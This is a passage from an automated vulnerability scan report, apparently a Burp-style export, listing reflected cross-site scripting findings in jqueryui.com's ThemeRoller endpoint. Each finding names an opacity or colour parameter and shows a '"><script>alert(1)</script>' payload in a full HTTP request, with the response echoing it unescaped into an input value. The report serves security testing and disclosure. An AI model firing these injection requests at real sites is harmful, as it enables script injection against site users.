rror=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccce1d32"><script>alert(1)</script>2deb2d37d2&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:50 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39550


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorShadow" id="bgColorShadow" class="hex" value="cccccce1d32\\\"><script>alert(1)</script>2deb2d37d2" />
...[SNIP]...

1.139. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd8c"><script>alert(1)</script>8dfbc90f084 was submitted in the bgImgOpacityActive parameter. This input was echoed as ebd8c\\\"><script>alert(1)</script>8dfbc90f084 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30ebd8c"><script>alert(1)</script>8dfbc90f084&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityActive" class="opacity" value="30ebd8c\\\"><script>alert(1)</script>8dfbc90f084" />
...[SNIP]...

1.140. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bffa6"><script>alert(1)</script>b6c8666acf9 was submitted in the bgImgOpacityContent parameter. This input was echoed as bffa6\\\"><script>alert(1)</script>b6c8666acf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100bffa6"><script>alert(1)</script>b6c8666acf9&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityContent" class="opacity" value="100bffa6\\\"><script>alert(1)</script>b6c8666acf9" />
...[SNIP]...

1.141. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e16f9"><script>alert(1)</script>292b42bf4e0 was submitted in the bgImgOpacityDefault parameter. This input was echoed as e16f9\\\"><script>alert(1)</script>292b42bf4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60e16f9"><script>alert(1)</script>292b42bf4e0&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:31 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityDefault" class="opacity" value="60e16f9\\\"><script>alert(1)</script>292b42bf4e0" />
...[SNIP]...

1.142. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f7c0"><script>alert(1)</script>cce24fe0f0 was submitted in the bgImgOpacityError parameter. This input was echoed as 8f7c0\\\"><script>alert(1)</script>cce24fe0f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=208f7c0"><script>alert(1)</script>cce24fe0f0&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39550


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityError" class="opacity" value="208f7c0\\\"><script>alert(1)</script>cce24fe0f0" />
...[SNIP]...

1.143. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10502"><script>alert(1)</script>7764413a2d6 was submitted in the bgImgOpacityHeader parameter. This input was echoed as 10502\\\"><script>alert(1)</script>7764413a2d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=4510502"><script>alert(1)</script>7764413a2d6&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:24 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityHeader" class="opacity" value="4510502\\\"><script>alert(1)</script>7764413a2d6" />
...[SNIP]...

1.144. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0d13"><script>alert(1)</script>b6c76063701 was submitted in the bgImgOpacityHighlight parameter. This input was echoed as b0d13\\\"><script>alert(1)</script>b6c76063701 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

